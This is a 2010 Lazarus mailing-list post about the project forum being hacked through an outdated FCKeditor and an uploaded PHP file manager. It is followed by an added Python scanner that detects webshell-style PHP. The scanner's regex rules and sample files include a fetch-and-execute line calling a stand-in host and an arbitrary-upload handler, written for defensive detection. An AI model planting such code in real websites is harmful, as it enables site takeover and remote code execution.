[Lazarus] Lazarus Forum seems to be hacked!

patspiper patspiper at yahoo.com
Thu Jan 28 18:17:46 CET 2010


Was the php shell C99madshell?

It seems many sites have been recently compromised via this shell.  The 
ways the shell is uploaded depend on the vulnerabilities of the forum 
software.

Marc Weustink wrote:
> Matt Shaffer wrote:
>> Right, but what I meant was if someone manages to upload their own PHP
>> file to the lazarus server, they can easily have uploaded a PHP file
>> manager which has the capability of deleting files, etc, without ever
>> needing ssh/ftp (this assumes the attack was done through a vulnerable
>> piece of software, that had write permissions, etc.)
>>
>> I don't think this scenario is extremely likely.
>
> This is probably what happened.
> As I see now, together with tinyportal comes an outdated FCKeditor. 
> This editor has known issues. The file manager in this editor has 
> access to some tp subdir where we found a php "filemanager" through 
> which you could upload files to the whole site.
> This way some "buy-your-software-here" webshop got installed and then 
> managed to add a piece of encoded php to index.php.
> What this encoded piece did was access a remote server, which in its 
> turn returned a piece of php which got executed. This piece of php 
> accesses our or similar webshops to generate traffic.
> This last part made browsing the site slow.
>
> At this moment the FCKeditor is disabled and removed.
>
> Marc
>
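
The injection described in the quoted message (an encoded PHP fragment in index.php that fetches and executes remote code, plus a PHP "filemanager" sitting in an editor upload directory) can be hunted for with a static scan of the webroot. This is an added example, not part of the original message or of the Lazarus site's tooling; the rule patterns, the upload directory names and the sample files are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Heuristic rules for the behaviour described in the thread (assumed, not a complete ruleset).
RULES = {name: re.compile(rx, re.I) for name, rx in {
    "eval-of-decoded-data": r"\b(?:eval|assert)\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(",
    "remote-fetch-then-eval": r"\b(?:eval|assert)\s*\(\s*(?:file_get_contents|curl_exec|fopen)\s*\(",
    "remote-include": r"\b(?:include|require)(?:_once)?\s*\(?\s*['\"](?:https?|ftp)://",
}.items()}
UPLOAD_DIRS = {"uploads", "userfiles", "attachments"}  # data-only dirs (assumed names)


def scan_source(text):
    """Return the sorted names of the rules that match one PHP source string."""
    return sorted(name for name, rx in RULES.items() if rx.search(text))


def scan_tree(root):
    """Map relative path -> findings for every .php file under root."""
    report = {}
    for path in sorted(Path(root).rglob("*.php")):
        findings = scan_source(path.read_text(errors="replace"))
        rel = path.relative_to(root)
        # Executable PHP inside a directory meant for uploaded data is a finding by itself.
        if UPLOAD_DIRS & {part.lower() for part in rel.parts[:-1]}:
            findings.append("php-in-upload-dir")
        if findings:
            report[rel.as_posix()] = findings
    return report


def demo():
    """Scan a constructed, harmless webroot built in a temporary directory."""
    samples = {
        "index.php": '<?php eval(base64_decode("ZWNobyAxOw==")); include "header.php"; ?>',
        "header.php": "<?php echo '<h1>Forum</h1>'; ?>",
        "tp/userfiles/fm.php": "<?php move_uploaded_file($_FILES['f']['tmp_name'], $_GET['to']); ?>",
        "shop/stats.php": '<?php eval(file_get_contents("http://example.invalid/x")); ?>',
    }
    with tempfile.TemporaryDirectory() as tmp:
        for name, body in samples.items():
            target = Path(tmp, name)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(body)
        return scan_tree(tmp)


if __name__ == "__main__":
    print(demo())
```

Matches are leads for manual review, not verdicts; comparing the webroot against a known-good copy of the forum software remains the more reliable check.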




